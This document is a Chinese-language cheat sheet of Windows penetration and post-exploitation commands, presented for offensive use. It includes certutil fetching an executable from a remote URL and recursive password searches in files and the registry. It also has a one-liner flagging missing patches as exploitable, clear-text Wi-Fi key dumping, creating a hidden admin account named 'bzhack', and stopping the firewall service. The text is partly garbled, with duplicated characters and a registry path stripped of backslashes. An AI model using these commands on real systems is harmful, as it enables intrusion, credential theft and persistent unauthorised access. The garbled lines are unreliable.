如果我有七個小時的時間來砍樹，那么我一定會花6個小時來磨我的斧頭！

滲透命令：

certutil-----從遠程url下載文件

案例:certutil -urlcache -split -f http://baidu.com/test.exe

findstr-----查找文件后綴結(jié)果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注冊表中的各種密碼數(shù)據(jù)

查看有沒有開啟遠程鏈接，運行下面命令：

REG QUERY "HKEY_LOCAL_macHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

結(jié)果：1表示關(guān)閉，0表示開啟

快速查找未打補丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt

常用命令：

ipconfig/all-----網(wǎng)絡(luò)配置情況

ipconfig /displayDNS-----查看本地DNS緩存

netsh wlan show profile-----查看連接過的 wifi 名

netsh wlan show profile WiFi-name key=clear 獲取 wifi 對應(yīng)的的密碼

query user-----查當前機器中正在線的用戶,看管理員在不在

net view------顯示域列表/計算機列表

net user------查看當前所有賬號，判斷域規(guī)模

net group-----查看當前域所有的組名

net user bzhack pass /add-----增加用戶

net user bzhack /del-----刪除用戶

net Localgroup-----添加、顯示本地組

net localgroup administrators bzhack /add-----將bzhack加入管理員組

net share----- 查看當前機器開啟的共享

文件操作：

md-----建文件夾

rd-----刪除文件夾

tree-----顯示文件夾結(jié)構(gòu)

dir-----顯示磁盤目錄內(nèi)容

copy-----復(fù)制文件

Xcopy-----copy加強版，復(fù)制文件夾

del-----刪除文件

ren-----[原文件/夾名][新文件/夾名]修改文件名

type-----查看文本內(nèi)容

dir /a /s /b d:"*.conf"-----搜索d盤里conf結(jié)尾的文件

edit-----文本編輯

type-----顯示文件內(nèi)容

網(wǎng)絡(luò)命令：

netstat -a----- 列出所有端口

netstat -p----- 顯示 PID 和進程名稱

netstat -r----- 顯示核心路由信息

netstat -at-----列出所有tcp連接

netstat -au-----列出所有ucp連接

netstat -an |find "3389" 查看開啟3389端口的信息

netstat -ano | findstr "ESTABLISHED" 查看當前正處于連接狀態(tài)的端口及ip

netstat -ano | findstr "LISTENING" 查看當前正處于監(jiān)聽狀態(tài)的端口及ip

其他命令

ver-----查看版本

hostname-----查看機器名

whoami-----查看權(quán)限

systeminfo-----查看配置

tasklist-----查看進程

cls-----清屏

net start-----查看開啟的服務(wù)，比如Terminal Services 遠程連接服務(wù)

net stop sharedaccess-----關(guān)閉防火墻

set-----查看當前機器的環(huán)境變量,看有沒有我們可以直接利用到的語言環(huán)境

fsutil fsinfo drives-----列出當前機器上的所有盤符